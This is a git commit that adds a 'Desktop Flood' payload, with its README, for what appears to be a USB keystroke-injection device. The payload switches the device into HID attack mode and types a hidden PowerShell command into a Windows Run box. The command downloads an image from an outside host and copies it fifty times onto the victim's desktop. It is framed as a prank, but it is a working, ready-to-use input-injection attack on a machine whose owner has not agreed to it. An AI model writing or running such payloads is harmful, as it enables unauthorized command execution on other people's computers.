Desktop flooder (#479)

* Desktop Flooder

downloads an image from a link and saves it, then copies the images all over the desktop.

* Update README.md

* Update README.md

* Update README.md

* Update payload.txt
pull/486/head
JustaProgrammer9 2022-01-21 20:02:26 -05:00 committed by GitHub
parent 95e1d22dee
commit f5292aa8ce
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 59 additions and 0 deletions

View File

@ -0,0 +1,13 @@
# DesktopFlood
Floods the desktop with a image of your choice
## Configuration
Image Link, Image Name, Amount of Images. Bluetooth if you want, in Setup
## LED
| COLOR | DESCRIPTION |
|---------|-------------|
| White | Setup/Wait |
| Yellow | Attacking |
| Green | Finished |

View File

@ -0,0 +1,46 @@
#!/bin/bash
#
# Title: Desktop Flood
# Description: Floods desktop with image it downloads from link
# Author: JustaProgrammer9
# Category: Prank
# Target: Windows
# Attackmodes: HID
#
#--// CONFIG \\--#
#removing [ https:// ] can help keep command below runbox character limit
ImageLink='i.ytimg.com/vi/7yN0g2QIJSU/maxresdefault.jpg'
ImageName="Gift"
Amount=50
####--// SETUP \\--####
LED W
ATTACKMODE HID
#--> FOR BLUETOOTH <--#
#WAIT_FOR_PRESENT YourDevice
#WAIT_FOR_NOT_PRESENT YourDevice
#--// ATTACK \\--#
LED Y
RUN WIN "cmd /c powershell \"curl $ImageLink -O C:\Users\%USERNAME%\Desktop\$ImageName.jpg;sleep 1;1..$Amount | % { copy-Item \"C:\Users\%USERNAME%\desktop\$ImageName.jpg\" \"C:\Users\%USERNAME%\desktop\$ImageName\$_.jpg\"}\""
Q ENTER
####--// DONE \\--####
LED G